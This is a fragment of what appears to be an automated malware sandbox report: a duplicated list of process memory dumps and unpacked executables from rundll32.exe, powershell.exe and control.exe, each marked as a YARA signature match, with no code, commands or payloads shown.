File source: 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271848621.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318449865.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271686999.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271578012.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272197057.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272332634.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 6596, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.fb0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a56b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a294a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.430345543.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.382198486.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.383295938.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.384393230.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.433324179.000000000472F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318295825.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.442468784.0000000005370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318372991.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271978374.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.319141424.00000000048AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272282667.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.317438075.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271906753.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271848621.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318449865.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271686999.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271578012.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272197057.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272332634.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 6596, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.fb0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a56b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a294a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.430345543.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.382198486.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.383295938.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.384393230.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.433324179.000000000472F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318295825.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.442468784.0000000005370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318372991.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |